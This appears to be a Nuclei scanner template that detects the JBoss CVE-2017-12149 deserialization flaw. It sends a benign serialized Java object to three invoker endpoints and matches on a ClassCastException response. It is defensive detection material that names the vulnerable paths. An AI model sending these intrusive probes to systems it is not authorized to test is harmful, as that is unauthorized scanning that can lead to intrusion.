id: CVE-2017-12149

info:
  name: Jboss Application Server - Remote Code Execution
  author: fopina,s0obi
  severity: critical
  description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because  the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
  remediation: |
    Apply the latest security patches and updates provided by Jboss to fix this vulnerability.
  reference:
    - https://chowdera.com/2020/12/20201229190934023w.html
    - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
    - https://bugzilla.redhat.com/show_bug.cgi?id=1486220
    - https://access.redhat.com/errata/RHSA-2018:1607
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-12149
    cwe-id: CWE-502
    epss-score: 0.9719
    epss-percentile: 0.99773
    cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: redhat
    product: jboss_enterprise_application_platform
  tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss,intrusive,redhat

http:
  - raw:
      - |
        POST /invoker/JMXInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
      - |
        POST /invoker/EJBInvokerServlet/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
      - |
        POST /invoker/readonly HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ClassCastException

      - type: status
        status:
          - 200
          - 500
# digest: 490a004630440220133852aaa95f2e35323d110b593d87320f9589e7e84f73b8c4d096bcf50b225202204fac13368e2877692f1281cad1df89fb4bb52ff3f3f2ef358f421f7232611308:922c64590222798bb761d5b6d8e72950